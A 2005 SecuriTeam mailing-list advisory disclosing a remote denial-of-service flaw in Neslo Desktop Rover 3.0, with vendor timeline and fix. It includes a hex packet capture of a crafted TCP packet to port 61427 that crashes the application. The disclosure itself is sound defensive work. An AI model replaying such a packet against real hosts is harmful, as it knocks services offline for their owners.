[NEWS] Neslo Desktop Rover Remote DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/05
- Previous message: SecuriTeam: "[NT] Windows File Selection May Lead to Command Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Apr 2005 16:12:23 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Neslo Desktop Rover Remote DoS
------------------------------------------------------------------------
SUMMARY
<http://www.nelsosoftware.com> Desktop Rover is "a software application
for Microsoft Windows that provides the features of a hardware KVM
(Keyboard, Video, Mouse)". Desktop Rover is vulnerable to a denial of
service (DoS). A remote attacker could send a specially crafted packet to
trigger an invalid memory access to crash the application, resulting in a
denial of service.
DETAILS
Vulnerable Systems:
* Neslo Desktop Rover version 3.0
Immune Systems:
* Neslo Desktop Rover version 3.1
By default the Desktop Rover listens on port 61427/TCP, it also
conveniently opens up this port in the Windows XP personal firewall. This
packet is an example packet that will cause a denial of service, there are
more variations, but this will suffice for example.
20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum
ok] 1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
Solution:
The vendor is releasing a fix in version 3.1 soon which will address the
vulnerability, until then restricting access to the Desktop Rover ports
will reduce the risk of this vulnerability being exploited.
Disclosure Timeline:
4.14.2005 - Initial vendor contact by e-mail
4.15.2005 - Initial vendor response. Vendor addressed vulnerability. Fix
confirmed by EvilPacket Security Research
4.19.2005 - Advisory released
ADDITIONAL INFORMATION
The information has been provided by <mailto:evilpacket@gmail.com> Adam
Baldwin.
The original article can be found at:
<http://www.evilpacket.net/advisories/EP-000-0003.html>
http://www.evilpacket.net/advisories/EP-000-0003.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Windows File Selection May Lead to Command Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
